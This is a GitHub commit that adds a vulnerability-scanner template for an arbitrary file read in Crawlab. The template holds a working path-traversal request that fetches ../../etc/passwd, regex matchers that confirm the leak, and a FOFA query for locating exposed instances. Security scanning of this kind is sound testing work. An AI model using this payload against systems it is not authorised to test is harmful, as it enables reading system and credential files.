Merge pull request #7878 from projectdiscovery/pussycat0x-patch-2

Crawlab File - Arbitrary File Read
patch-1
Ritik Chaddha 2023-08-08 14:15:12 +05:30 committed by GitHub
commit 09082d9a06
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: crawlab-lfi
info:
name: Crawlab - Arbitrary File Read
author: pussycat0x
severity: high
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Crawlab%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
verified: true
fofa-query: title="Crawlab"
tags: crawlab,lfi
http:
- method: GET
path:
- "{{BaseURL}}/api/file?path=../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "data\":\""
- "error\":"
condition: and
- type: status
status:
- 200